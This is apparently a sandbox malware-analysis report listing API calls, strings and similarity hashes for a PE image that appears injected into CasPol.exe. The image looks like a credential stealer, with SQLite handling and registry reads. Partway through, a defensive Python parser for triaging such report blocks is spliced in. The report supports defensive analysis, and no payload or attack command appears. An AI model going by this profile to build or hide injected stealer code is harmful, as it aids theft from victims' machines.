                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                  • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                  • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                  APIs
                                                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3015003838-0
                                                                                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                  APIs
                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                  • free.MSVCRT ref: 004185AC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2802642348-0
                                                                                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
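The function listings above are the Joe Sandbox IDA plugin's per-function records for the PE that was mapped into CasPol.exe at 0x400000 (every block carries the same memory-dump source). When triaging a sample with hundreds of such blocks it helps to turn them into structured records: which Win32 calls each function makes, which strings it references, which process and memory region it was lifted from, and a few heuristic labels. The parser below is an added example written for this page, not Joe Sandbox's or the sample's own code. Its sample input is two blocks copied from the report above with the opcode and fuzzy-hash lines omitted. It decodes only the parts of the `.sdmp` name that the `hcaresult_13_2_400000_CasPol.jbxd` snapshot name corroborates (process number 13, stage 2, base 0x400000); reading the fifth dotted field (`00000040`) as a winnt.h page-protection value is an assumption, and the triage rule labels are the author's heuristics, not report fields.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: two function blocks copied from the report above as rendered
# (bullet glyphs and field names intact), minus the opcode/fuzzy-hash lines.
SAMPLE_REPORT = """\
APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• FreeLibrary.KERNEL32(00000000), ref: 004044E9
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• API String ID: 2780580303-317687271
APIs
Strings
• out of memory, xrefs: 0042F865
• cannot ATTACH database within transaction, xrefs: 0042F663
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcpymemset
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?(?P<name>[^.(\s]+)"
                    r"\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
SDMP_RE = re.compile(r"^(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.\d+\.(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.")
SNAP_RE = re.compile(r"^hcaresult_(?P<proc>\d+)_(?P<stage>\d+)_(?P<base>[0-9a-fA-F]+)_(?P<image>.+)\.jbxd$")
# winnt.h page-protection values; treating the fifth .sdmp field as one is an assumption.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                       # call-site address inside the dump
    subcall_of: int | None = None  # set for "Part of subcall function X" lines

@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, int]] = field(default_factory=list)  # (text, xref address)
    meta: dict[str, str] = field(default_factory=dict)            # Source File, API ID, ...

def parse_blocks(text: str) -> list[FunctionBlock]:
    """Split the rendered report into function blocks; each starts at an 'APIs' header."""
    blocks, section = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in SECTIONS:
            if line == "APIs":
                blocks.append(FunctionBlock())
            section = line
        elif blocks and line.startswith("•"):
            b = blocks[-1]
            if section == "APIs" and (m := API_RE.match(line)):
                args = m["args"].split(",") if m["args"] else []
                b.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                      int(m["sub"], 16) if m["sub"] else None))
            elif section == "Strings" and (m := STRING_RE.match(line)):
                b.strings.append((m["text"], int(m["ref"], 16)))
            elif section not in ("APIs", "Strings") and (m := KV_RE.match(line)):
                b.meta[m["key"].strip()] = m["value"].strip()
    return blocks

def dump_info(block: FunctionBlock) -> dict:
    """Decode which process/region the function came from and cross-check the .sdmp
    name against the IDA snapshot name (process number, stage, base address)."""
    src = SDMP_RE.match(block.meta.get("Source File", ""))
    snap = SNAP_RE.match(block.meta.get("Snapshot File", ""))
    if not (src and snap):
        raise ValueError("block lacks Source File / Snapshot File metadata")
    prot = int(src["prot"], 16)
    info = {"process": int(src["proc"], 16), "stage": int(src["stage"], 16),
            "base": int(src["base"], 16), "protection": PAGE_PROTECT.get(prot, hex(prot)),
            "image": snap["image"], "pe_header": "based on PE: true" in block.meta["Source File"]}
    info["consistent"] = (info["process"], info["stage"], info["base"]) == (
        int(snap["proc"]), int(snap["stage"]), int(snap["base"], 16))
    return info

# Heuristic triage labels (author's own): (required top-level API names, required string fragment, label).
RULES = [({"LoadLibraryW", "GetProcAddress"}, None, "resolves an import at run time"),
         ({"LockFile", "UnlockFile"}, None, "byte-range file locking (SQLite-style)"),
         (set(), "ATTACH database", "embedded SQLite error strings")]

def triage(blocks: list[FunctionBlock]) -> list[tuple[int, str]]:
    """Return (block index, label) for every rule a block satisfies; subcall lines are ignored."""
    hits = []
    for i, b in enumerate(blocks):
        names = {a.name for a in b.apis if a.subcall_of is None}
        text = "\n".join(s for s, _ in b.strings)
        hits += [(i, label) for apis, frag, label in RULES
                 if apis <= names and (frag is None or frag in text)]
    return hits
```

Run `triage(parse_blocks(SAMPLE_REPORT))` to get the labelled blocks; on the full report the same parser lets you group every function by `dump_info(...)["base"]` and `["protection"]`, which separates the injected RWX image at 0x400000 from CasPol.exe's own code. The "Part of subcall function" lines are kept but tagged with their parent address, so API sets used for matching reflect only the function's direct calls.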
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                  • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                  • String ID: strings
                                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040D8BD
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                  • memset.MSVCRT ref: 0040D906
                                                                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                  • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                  • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                  • memset.MSVCRT ref: 0041BA3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: -journal$-wal
                                                                                                                  • API String ID: 438689982-2894717839
                                                                                                                  • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                  • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                  APIs
                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                  • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4218492932-0
                                                                                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                  • String ID: 0$6
                                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                  • memset.MSVCRT ref: 00405455
                                                                                                                  • memset.MSVCRT ref: 0040546C
                                                                                                                  • memset.MSVCRT ref: 00405483
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy$ErrorLast
                                                                                                                  • String ID: 6$\
                                                                                                                  • API String ID: 404372293-1284684873
                                                                                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                  APIs
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1331804452-0
                                                                                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: advapi32.dll
                                                                                                                  • API String ID: 2012295524-4050573280
                                                                                                                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                  • String ID: %2.2X
                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                  • API String ID: 999028693-502967061
                                                                                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                    • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
